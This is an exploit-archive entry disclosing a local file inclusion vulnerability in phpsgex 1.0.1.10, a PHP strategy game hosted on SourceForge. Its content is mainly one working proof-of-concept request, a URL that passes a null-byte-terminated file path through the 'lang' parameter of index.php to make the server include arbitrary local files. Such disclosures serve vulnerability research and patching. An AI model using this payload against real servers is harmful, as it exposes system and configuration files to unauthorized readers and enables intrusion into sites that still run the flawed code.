id: 22204
date: 05/01/2014
title: phpsgex 1.0.1.10 Local File Include Vulnerability
author: JiKo
cves: 

----------[exploit Debut]
[Local File Include Vulnerability]
----------[Script Info]
 
Moi : JIKO
 
----------[Script Info]
 
Site           : http://sourceforge.net/projects/phpstrategygame/
Version     : 1.0.1.10
Download    :

http://sourceforge.net/projects/phpstrategygame/files/latest/download?

source=directory
 
----------[exploit Info]
 
1]~
http://localhost/Path/index.php?lang=File%00


----------[exploit Fin]

#  0day.today [2023-03-25]  #